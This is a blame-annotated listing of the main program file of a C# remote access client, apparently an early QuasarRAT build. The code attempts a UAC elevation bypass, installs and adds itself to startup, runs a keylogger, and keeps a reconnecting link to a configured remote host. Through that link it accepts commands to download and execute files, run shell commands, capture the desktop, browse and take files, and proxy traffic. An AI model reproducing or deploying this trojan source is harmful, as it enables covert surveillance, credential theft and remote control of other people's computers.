2015-01-13 18:29:11 +00:00
|
|
|
|
using System;
|
2015-05-31 17:22:00 +00:00
|
|
|
|
using System.Diagnostics;
|
2014-07-08 12:58:53 +00:00
|
|
|
|
using System.IO;
|
|
|
|
|
using System.Threading;
|
|
|
|
|
using System.Windows.Forms;
|
2015-01-13 18:29:11 +00:00
|
|
|
|
using xClient.Config;
|
|
|
|
|
using xClient.Core;
|
|
|
|
|
using xClient.Core.Commands;
|
2015-05-01 12:50:38 +00:00
|
|
|
|
using xClient.Core.Keylogger;
|
2015-01-13 18:29:11 +00:00
|
|
|
|
using xClient.Core.Packets;
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
namespace xClient
|
2014-07-08 12:58:53 +00:00
|
|
|
|
{
|
2015-04-21 18:27:52 +00:00
|
|
|
|
internal static class Program
|
2014-07-08 12:58:53 +00:00
|
|
|
|
{
|
2015-01-15 09:10:52 +00:00
|
|
|
|
public static Client ConnectClient;
|
|
|
|
|
private static bool _reconnect = true;
|
|
|
|
|
private static volatile bool _connected = false;
|
|
|
|
|
private static Mutex _appMutex;
|
2015-05-23 12:09:55 +00:00
|
|
|
|
private static ApplicationContext _msgLoop;
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
[STAThread]
|
|
|
|
|
private static void Main(string[] args)
|
2014-07-08 12:58:53 +00:00
|
|
|
|
{
|
2015-01-13 18:29:11 +00:00
|
|
|
|
Application.EnableVisualStyles();
|
|
|
|
|
Application.SetCompatibleTextRenderingDefault(false);
|
2015-03-17 16:22:42 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
Settings.Initialize();
|
|
|
|
|
Initialize();
|
|
|
|
|
if (!SystemCore.Disconnect)
|
|
|
|
|
Connect();
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-03-17 16:22:42 +00:00
|
|
|
|
Cleanup();
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
private static void Cleanup()
|
|
|
|
|
{
|
2015-01-13 18:29:11 +00:00
|
|
|
|
CommandHandler.CloseShell();
|
2015-03-18 17:57:51 +00:00
|
|
|
|
if (CommandHandler.LastDesktopScreenshot != null)
|
|
|
|
|
CommandHandler.LastDesktopScreenshot.Dispose();
|
2015-05-01 12:50:38 +00:00
|
|
|
|
if (Logger.Instance != null)
|
2015-05-20 15:50:47 +00:00
|
|
|
|
Logger.Instance.Dispose();
|
2015-05-23 12:24:31 +00:00
|
|
|
|
if (_msgLoop != null)
|
|
|
|
|
_msgLoop.ExitThread();
|
2015-01-15 09:10:52 +00:00
|
|
|
|
if (_appMutex != null)
|
|
|
|
|
_appMutex.Close();
|
2015-03-31 18:38:16 +00:00
|
|
|
|
|
|
|
|
|
CommandHandler.StreamCodec = null;
|
2014-07-08 12:58:53 +00:00
|
|
|
|
}
|
|
|
|
|
|
2015-02-24 11:13:04 +00:00
|
|
|
|
private static void InitializeClient()
|
|
|
|
|
{
|
2015-03-31 16:15:48 +00:00
|
|
|
|
ConnectClient = new Client();
|
2015-02-24 11:13:04 +00:00
|
|
|
|
|
2015-04-21 18:27:52 +00:00
|
|
|
|
ConnectClient.AddTypesToSerializer(typeof (IPacket), new Type[]
|
|
|
|
|
{
|
|
|
|
|
typeof (Core.Packets.ServerPackets.InitializeCommand),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.Disconnect),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.Reconnect),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.Uninstall),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.DownloadAndExecute),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.UploadAndExecute),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.Desktop),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.GetProcesses),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.KillProcess),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.StartProcess),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.Drives),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.Directory),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.DownloadFile),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.MouseClick),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.GetSystemInfo),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.VisitWebsite),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.ShowMessageBox),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.Update),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.Monitors),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.ShellCommand),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.Rename),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.Delete),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.Action),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.GetStartupItems),
|
|
|
|
|
typeof (Core.Packets.ServerPackets.AddStartupItem),
|
2015-05-26 21:11:16 +00:00
|
|
|
|
typeof (Core.Packets.ServerPackets.RemoveStartupItem),
|
2015-04-21 18:27:52 +00:00
|
|
|
|
typeof (Core.Packets.ServerPackets.DownloadFileCanceled),
|
2015-04-22 19:39:52 +00:00
|
|
|
|
typeof (Core.Packets.ServerPackets.GetLogs),
|
2015-04-21 18:27:52 +00:00
|
|
|
|
typeof (Core.Packets.ClientPackets.Initialize),
|
|
|
|
|
typeof (Core.Packets.ClientPackets.Status),
|
|
|
|
|
typeof (Core.Packets.ClientPackets.UserStatus),
|
|
|
|
|
typeof (Core.Packets.ClientPackets.DesktopResponse),
|
|
|
|
|
typeof (Core.Packets.ClientPackets.GetProcessesResponse),
|
|
|
|
|
typeof (Core.Packets.ClientPackets.DrivesResponse),
|
|
|
|
|
typeof (Core.Packets.ClientPackets.DirectoryResponse),
|
|
|
|
|
typeof (Core.Packets.ClientPackets.DownloadFileResponse),
|
|
|
|
|
typeof (Core.Packets.ClientPackets.GetSystemInfoResponse),
|
|
|
|
|
typeof (Core.Packets.ClientPackets.MonitorsResponse),
|
|
|
|
|
typeof (Core.Packets.ClientPackets.ShellCommandResponse),
|
2015-04-22 19:39:52 +00:00
|
|
|
|
typeof (Core.Packets.ClientPackets.GetStartupItemsResponse),
|
2015-05-17 04:07:17 +00:00
|
|
|
|
typeof (Core.Packets.ClientPackets.GetLogsResponse),
|
2015-05-10 17:02:10 +00:00
|
|
|
|
typeof (Core.ReverseProxy.Packets.ReverseProxyConnect),
|
|
|
|
|
typeof (Core.ReverseProxy.Packets.ReverseProxyConnectResponse),
|
|
|
|
|
typeof (Core.ReverseProxy.Packets.ReverseProxyData),
|
|
|
|
|
typeof (Core.ReverseProxy.Packets.ReverseProxyDisconnect)
|
2015-02-24 11:13:04 +00:00
|
|
|
|
});
|
|
|
|
|
|
|
|
|
|
ConnectClient.ClientState += ClientState;
|
|
|
|
|
ConnectClient.ClientRead += ClientRead;
|
2015-05-31 17:22:00 +00:00
|
|
|
|
ConnectClient.ClientFail += ClientFail;
|
2015-02-24 11:13:04 +00:00
|
|
|
|
}
|
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
private static void Initialize()
|
2014-07-08 12:58:53 +00:00
|
|
|
|
{
|
2015-01-15 09:10:52 +00:00
|
|
|
|
Thread.Sleep(2000);
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
SystemCore.OperatingSystem = SystemCore.GetOperatingSystem();
|
|
|
|
|
SystemCore.MyPath = Application.ExecutablePath;
|
2015-04-25 16:49:52 +00:00
|
|
|
|
SystemCore.InstallPath = Path.Combine(Settings.DIR, ((!string.IsNullOrEmpty(Settings.SUBFOLDER)) ? Settings.SUBFOLDER + @"\" : "") + Settings.INSTALLNAME);
|
2015-01-13 18:29:11 +00:00
|
|
|
|
SystemCore.AccountType = SystemCore.GetAccountType();
|
|
|
|
|
SystemCore.InitializeGeoIp();
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
if (Settings.ENABLEUACESCALATION)
|
|
|
|
|
{
|
|
|
|
|
if (SystemCore.TryUacTrick())
|
|
|
|
|
SystemCore.Disconnect = true;
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
if (SystemCore.Disconnect)
|
|
|
|
|
return;
|
|
|
|
|
}
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
if (!Settings.INSTALL || SystemCore.MyPath == SystemCore.InstallPath)
|
2014-07-08 12:58:53 +00:00
|
|
|
|
{
|
2015-01-15 09:10:52 +00:00
|
|
|
|
if (!SystemCore.CreateMutex(ref _appMutex))
|
2015-01-13 18:29:11 +00:00
|
|
|
|
SystemCore.Disconnect = true;
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
if (SystemCore.Disconnect)
|
|
|
|
|
return;
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
new Thread(SystemCore.UserIdleThread).Start();
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-05-31 18:52:03 +00:00
|
|
|
|
if (Settings.STARTUP && Settings.INSTALL)
|
2015-05-26 16:28:15 +00:00
|
|
|
|
{
|
|
|
|
|
SystemCore.AddToStartup();
|
|
|
|
|
}
|
|
|
|
|
|
2015-02-24 11:13:04 +00:00
|
|
|
|
InitializeClient();
|
2015-05-01 12:50:38 +00:00
|
|
|
|
|
|
|
|
|
if (Settings.ENABLELOGGER)
|
|
|
|
|
{
|
|
|
|
|
new Thread(() =>
|
|
|
|
|
{
|
2015-05-23 12:09:55 +00:00
|
|
|
|
_msgLoop = new ApplicationContext();
|
2015-05-20 15:50:47 +00:00
|
|
|
|
Logger logger = new Logger(15000);
|
2015-05-23 12:09:55 +00:00
|
|
|
|
Application.Run(_msgLoop);
|
|
|
|
|
}).Start(); ;
|
2015-05-01 12:50:38 +00:00
|
|
|
|
}
|
2015-01-13 18:29:11 +00:00
|
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
2015-01-15 09:10:52 +00:00
|
|
|
|
if (!SystemCore.CreateMutex(ref _appMutex))
|
2015-01-13 18:29:11 +00:00
|
|
|
|
SystemCore.Disconnect = true;
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
if (SystemCore.Disconnect)
|
|
|
|
|
return;
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
SystemCore.Install();
|
|
|
|
|
}
|
|
|
|
|
}
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
private static void Connect()
|
2014-07-08 12:58:53 +00:00
|
|
|
|
{
|
2015-01-13 18:29:11 +00:00
|
|
|
|
TryAgain:
|
|
|
|
|
Thread.Sleep(250 + new Random().Next(0, 250));
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-15 09:10:52 +00:00
|
|
|
|
if (!_connected)
|
|
|
|
|
ConnectClient.Connect(Settings.HOST, Settings.PORT);
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
Thread.Sleep(200);
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
Application.DoEvents();
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
HoldOpen:
|
2015-01-15 09:10:52 +00:00
|
|
|
|
while (_connected) // hold client open
|
2015-01-13 18:29:11 +00:00
|
|
|
|
{
|
|
|
|
|
Application.DoEvents();
|
|
|
|
|
Thread.Sleep(2500);
|
|
|
|
|
}
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
Thread.Sleep(Settings.RECONNECTDELAY + new Random().Next(250, 750));
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
if (SystemCore.Disconnect)
|
|
|
|
|
{
|
2015-01-15 09:10:52 +00:00
|
|
|
|
ConnectClient.Disconnect();
|
2015-01-13 18:29:11 +00:00
|
|
|
|
return;
|
|
|
|
|
}
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-01-15 09:10:52 +00:00
|
|
|
|
if (_reconnect && !SystemCore.Disconnect && !_connected)
|
2015-01-13 18:29:11 +00:00
|
|
|
|
goto TryAgain;
|
|
|
|
|
else
|
|
|
|
|
goto HoldOpen;
|
2014-07-08 12:58:53 +00:00
|
|
|
|
}
|
2015-01-13 18:29:11 +00:00
|
|
|
|
|
2015-05-28 22:25:40 +00:00
|
|
|
|
public static void Disconnect(bool reconnect = false)
|
2014-07-17 21:22:59 +00:00
|
|
|
|
{
|
2015-05-04 14:46:34 +00:00
|
|
|
|
if (reconnect)
|
|
|
|
|
CommandHandler.CloseShell();
|
|
|
|
|
else
|
|
|
|
|
SystemCore.Disconnect = true;
|
|
|
|
|
ConnectClient.Disconnect();
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
private static void LostConnection()
|
|
|
|
|
{
|
|
|
|
|
CommandHandler.CloseShell();
|
|
|
|
|
}
|
2015-01-13 18:29:11 +00:00
|
|
|
|
|
2015-05-04 14:46:34 +00:00
|
|
|
|
private static void ClientState(Client client, bool connected)
|
|
|
|
|
{
|
2015-01-13 18:29:11 +00:00
|
|
|
|
if (connected && !SystemCore.Disconnect)
|
2015-01-15 09:10:52 +00:00
|
|
|
|
_reconnect = true;
|
2015-01-13 18:29:11 +00:00
|
|
|
|
else if (!connected && SystemCore.Disconnect)
|
2015-01-15 09:10:52 +00:00
|
|
|
|
_reconnect = false;
|
2015-01-13 18:29:11 +00:00
|
|
|
|
else
|
2015-01-15 09:10:52 +00:00
|
|
|
|
_reconnect = !SystemCore.Disconnect;
|
2015-05-04 14:46:34 +00:00
|
|
|
|
|
|
|
|
|
if (_connected != connected && !connected && _reconnect && !SystemCore.Disconnect)
|
|
|
|
|
LostConnection();
|
|
|
|
|
|
|
|
|
|
_connected = connected;
|
2014-07-17 21:22:59 +00:00
|
|
|
|
}
|
2015-01-13 18:29:11 +00:00
|
|
|
|
|
2015-01-15 09:10:52 +00:00
|
|
|
|
private static void ClientRead(Client client, IPacket packet)
|
2014-07-22 19:52:07 +00:00
|
|
|
|
{
|
2015-05-28 22:25:40 +00:00
|
|
|
|
PacketHandler.HandlePacket(client, packet);
|
2014-07-22 19:52:07 +00:00
|
|
|
|
}
|
2015-05-31 17:22:00 +00:00
|
|
|
|
|
|
|
|
|
private static void ClientFail(Client client, Exception ex)
|
|
|
|
|
{
|
|
|
|
|
Debug.WriteLine("Exception Message: " + ex.Message);
|
|
|
|
|
client.Disconnect();
|
|
|
|
|
}
|
2014-07-08 12:58:53 +00:00
|
|
|
|
}
|
2015-01-13 18:29:11 +00:00
|
|
|
|
}
|